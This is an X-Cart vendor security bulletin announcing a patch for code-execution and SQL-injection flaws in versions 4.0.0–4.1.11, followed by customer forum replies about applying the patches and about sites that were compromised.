Security bulletin 2008-25-12
 

Dear X-Cart customer,

During internal audit activities several moderate security issues have been detected in X-Cart. The issues make the software potentially
vulnerable to attackers who wish to gain access to the application back-end. The solution is to apply the update released by Qualiteam.

SEVERITY

Moderate

IMPACT

A malicious user can redeclare used variables, execute his own php code and, as a result, gain access to the application back-end, store database and server file system.

AFFECTED VERSIONS

All X-Cart versions from 4.0.0 to 4.1.11

SOLUTION

We strongly recommend X-Cart users to install the security fix available in the HelpDesk 'File Area'.
The following security improvements are included in the patch:
- protection from unallowed access to back-end, store database and server file system, using GET or POST queries (formed in a special way) has been added.
- an extra protection level against SQL injections has been added.

Where to download the patch:

Please, check your File Area:
* For X-Cart 4.1.11 version:
check folders X-Cart -> X-Cart 4.1.11 (current version) -> Updates and patches

* For X-Cart 4.0.0 - 4.1.10 versions:
check folders X-Cart -> X-Cart supporting files for prev versions -> {Your X-Cart branch} -> {Your X-Cart version} -> Updates and patches

Installation instructions can be found in the README.txt file attached to the .tgz archive.

NOTE:
If you are using X-Cart versions 4.1.0 - 4.1.11, please, ensure you had installed all the previous security fixes *prior to* applying this new patch.

If you have any questions or concerns, feel free to contact our support team via your Helpdesk.

X-Cart Team & Qualiteam Tech Support department

Re: Security bulletin 2008-25-12
 

Wow... Well thanks for posting these patches so quickly!

Re: Security bulletin 2008-25-12
 

Yay Merry Chistmas :P

Re: Security bulletin 2008-25-12
 

Ene,

Is this patch a revision of patch 2008-18-12?
Seems all the same files are being patched on both.

Re: Security bulletin 2008-25-12
 

Sounds like a patch to prior patches. At least for 4.1.x

Looking at 4.0.19 it patches register.php like previous security patches but not any of the same lines so it can be applied independently (not sure why you would want to do that). It does mean you can't use the overwrite version if you have applied the prior security patches - use the diffs.

Re: Security bulletin 2008-25-12
 

No. It is a different patch.

Re: Security bulletin 2008-25-12
 

I reported this vulnerability on the 21st when I found that someone had somehow installed a couple fake Bank of America login pages on my server. I would strongly suggest that all users check their file system just to be safe.

The pages were loaded to my /payment/ directory on my server.

Also... if you don't need it to be on "allow_url_fopen" in your php.ini should be off as that will stop them from running the scripts from other servers.

Re: Security bulletin 2008-25-12
 

There was only one file to update for version 4.1.10, prepare.php, so it was a pretty simple patch :)

Re: Security bulletin 2008-25-12
 

Just to clarify to everyone.

There is 2 patches

One from DEC 18th

and a NEW one from the 25

we installed the one from the 18th but not the one from the 25 and we got hacked

Re: Security bulletin 2008-25-12
 

We're seeing a few people who have not applied the secondary patches and are now having issues. The news of the latest exploit seems to have spread pretty quickly.